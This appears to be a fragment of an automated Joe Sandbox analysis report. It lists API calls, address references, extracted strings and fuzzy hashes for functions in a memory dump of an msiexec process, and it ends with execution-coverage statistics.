                                                                                                      • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                      • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                                                                      APIs
                                                                                                      • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                                                                      • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                                                      • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy$DialogHandleModuleParam
                                                                                                      • String ID:
                                                                                                      • API String ID: 1386444988-0
                                                                                                      • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                      • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                                                                      • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                      • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ??3@
                                                                                                      • String ID:
                                                                                                      • API String ID: 613200358-0
                                                                                                      • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                      • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                                                                      • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                      • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                                                                      APIs
                                                                                                      • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                                                                      • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InvalidateMessageRectSend
                                                                                                      • String ID: d=E
                                                                                                      • API String ID: 909852535-3703654223
                                                                                                      • Opcode ID: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                                                                      • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                                                                                      • Opcode Fuzzy Hash: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                                                                      • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                                                                                      APIs
                                                                                                      • wcschr.MSVCRT ref: 0040F79E
                                                                                                      • wcschr.MSVCRT ref: 0040F7AC
                                                                                                        • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                                                        • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4,?,?,?,?,004032AB,?), ref: 0040AACB
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: wcschr$memcpywcslen
                                                                                                      • String ID: "
                                                                                                      • API String ID: 1983396471-123907689
                                                                                                      • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                                      • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                                                                      • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                                      • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                                                                      APIs
                                                                                                        • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                      • _memicmp.MSVCRT ref: 0040C00D
                                                                                                      • memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FilePointer_memicmpmemcpy
                                                                                                      • String ID: URL
                                                                                                      • API String ID: 2108176848-3574463123
                                                                                                      • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                                      • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                                                                                      • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                                      • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                                                                                      APIs
                                                                                                      • _snwprintf.MSVCRT ref: 0040A398
                                                                                                      • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _snwprintfmemcpy
                                                                                                      • String ID: %2.2X
                                                                                                      • API String ID: 2789212964-323797159
                                                                                                      • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                                      • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                                                                      • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                                      • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _snwprintf
                                                                                                      • String ID: %%-%d.%ds
                                                                                                      • API String ID: 3988819677-2008345750
                                                                                                      • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                                      • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                                                                      • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                                      • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040E770
                                                                                                      • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSendmemset
                                                                                                      • String ID: F^@
                                                                                                      • API String ID: 568519121-3652327722
                                                                                                      • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                                      • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                                                                      • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                                      • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: PlacementWindowmemset
                                                                                                      • String ID: WinPos
                                                                                                      • API String ID: 4036792311-2823255486
                                                                                                      • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                                      • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                                                                      • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                                      • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                                                                      APIs
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00412966,/deleteregkey,/savelangfile), ref: 004125C3
                                                                                                      • DeleteObject.GDI32(00000000), ref: 004125E7
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ??3@DeleteObject
                                                                                                      • String ID: r!A
                                                                                                      • API String ID: 1103273653-628097481
                                                                                                      • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                                      • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                                                      • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                                      • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                                                      APIs
                                                                                                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                      • wcsrchr.MSVCRT ref: 0040DCE9
                                                                                                      • wcscat.MSVCRT ref: 0040DCFF
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileModuleNamewcscatwcsrchr
                                                                                                      • String ID: _lng.ini
                                                                                                      • API String ID: 383090722-1948609170
                                                                                                      • Opcode ID: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                                                                      • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                                                                                      • Opcode Fuzzy Hash: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                                                                      • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                                                                                      APIs
                                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                      • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                                                                      • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                                      • API String ID: 2773794195-880857682
                                                                                                      • Opcode ID: 92b59310a7696b31d56b4dabc8b2146732067b292673cf67eedff05cdcb4dbe7
                                                                                                      • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                                                                      • Opcode Fuzzy Hash: 92b59310a7696b31d56b4dabc8b2146732067b292673cf67eedff05cdcb4dbe7
                                                                                                      • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                                                                                      APIs
                                                                                                      • memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
                                                                                                      • memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
                                                                                                      • memset.MSVCRT ref: 0042BAAE
                                                                                                      • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy$memset
                                                                                                      • String ID:
                                                                                                      • API String ID: 438689982-0
                                                                                                      • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                                      • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                                                                      • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                                      • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                                                                      APIs
                                                                                                        • Part of subcall function 0040A13C: memset.MSVCRT ref: 0040A14A
                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 0040E84D
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E874
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E895
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E8B6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ??2@$memset
                                                                                                      • String ID:
                                                                                                      • API String ID: 1860491036-0
                                                                                                      • Opcode ID: 64ebc759205d781c7cf4e92d27d3280bf84a4b50b74f77ffe9b887a22ca43919
                                                                                                      • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                                                                      • Opcode Fuzzy Hash: 64ebc759205d781c7cf4e92d27d3280bf84a4b50b74f77ffe9b887a22ca43919
                                                                                                      • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                                                                      APIs
                                                                                                      • wcslen.MSVCRT ref: 0040A8E2
                                                                                                        • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                        • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                        • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                      • free.MSVCRT ref: 0040A908
                                                                                                      • free.MSVCRT ref: 0040A92B
                                                                                                      • memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: free$memcpy$mallocwcslen
                                                                                                      • String ID:
                                                                                                      • API String ID: 726966127-0
                                                                                                      • Opcode ID: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                                                                      • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                                                                      • Opcode Fuzzy Hash: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                                                                      • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                                                                      APIs
                                                                                                      • wcslen.MSVCRT ref: 0040B1DE
                                                                                                      • free.MSVCRT ref: 0040B201
                                                                                                        • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                        • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                        • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                      • free.MSVCRT ref: 0040B224
                                                                                                      • memcpy.MSVCRT(?,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: free$memcpy$mallocwcslen
                                                                                                      • String ID:
                                                                                                      • API String ID: 726966127-0
                                                                                                      • Opcode ID: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                                                                      • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                                                      • Opcode Fuzzy Hash: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                                                                      • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                                                      APIs
                                                                                                      • memcmp.MSVCRT(?,004599B8,00000010,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408AF3
                                                                                                        • Part of subcall function 00408A6E: memcmp.MSVCRT(00409690,00408B12,00000004,000000FF), ref: 00408A8C
                                                                                                        • Part of subcall function 00408A6E: memcpy.MSVCRT(00000363,004096AA,4415FF50,?), ref: 00408ABB
                                                                                                        • Part of subcall function 00408A6E: memcpy.MSVCRT(-00000265,004096AF,00000060,00000363,004096AA,4415FF50,?), ref: 00408AD0
                                                                                                      • memcmp.MSVCRT(?,00000000,0000000E,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B2B
                                                                                                      • memcmp.MSVCRT(?,00000000,0000000B,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B5C
                                                                                                      • memcpy.MSVCRT(0000023E,00409690,?), ref: 00408B79
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcmp$memcpy
                                                                                                      • String ID:
                                                                                                      • API String ID: 231171946-0
                                                                                                      • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                      • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                                                                      • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                      • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                                                                      APIs
                                                                                                      • strlen.MSVCRT ref: 0040B0D8
                                                                                                      • free.MSVCRT ref: 0040B0FB
                                                                                                        • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                        • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                        • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                      • free.MSVCRT ref: 0040B12C
                                                                                                      • memcpy.MSVCRT(?,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: free$memcpy$mallocstrlen
                                                                                                      • String ID:
                                                                                                      • API String ID: 3669619086-0
                                                                                                      • Opcode ID: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                                                                      • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                                                      • Opcode Fuzzy Hash: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                                                                      • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                                                      APIs
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ??2@
                                                                                                      • String ID:
                                                                                                      • API String ID: 1033339047-0
                                                                                                      • Opcode ID: 77d1c7bdcd1646b3b95541b6e0b18904d55dfd8e2e8227c06648e15793e87070
                                                                                                      • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                                      • Opcode Fuzzy Hash: 77d1c7bdcd1646b3b95541b6e0b18904d55dfd8e2e8227c06648e15793e87070
                                                                                                      • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                                                      APIs
                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                                                      • malloc.MSVCRT ref: 00417407
                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                                                      • free.MSVCRT ref: 00417425
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharMultiWide$freemalloc
                                                                                                      • String ID:
                                                                                                      • API String ID: 2605342592-0
                                                                                                      • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                                                      • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                                                      • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                                                      • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: wcslen$wcscat$wcscpy
                                                                                                      • String ID:
                                                                                                      • API String ID: 1961120804-0
                                                                                                      • Opcode ID: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                                                      • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                                                                      • Opcode Fuzzy Hash: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                                                      • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:2.1%
                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                      Signature Coverage:0.5%
                                                                                                      Total number of Nodes:762
                                                                                                      Total number of Limit Nodes:20
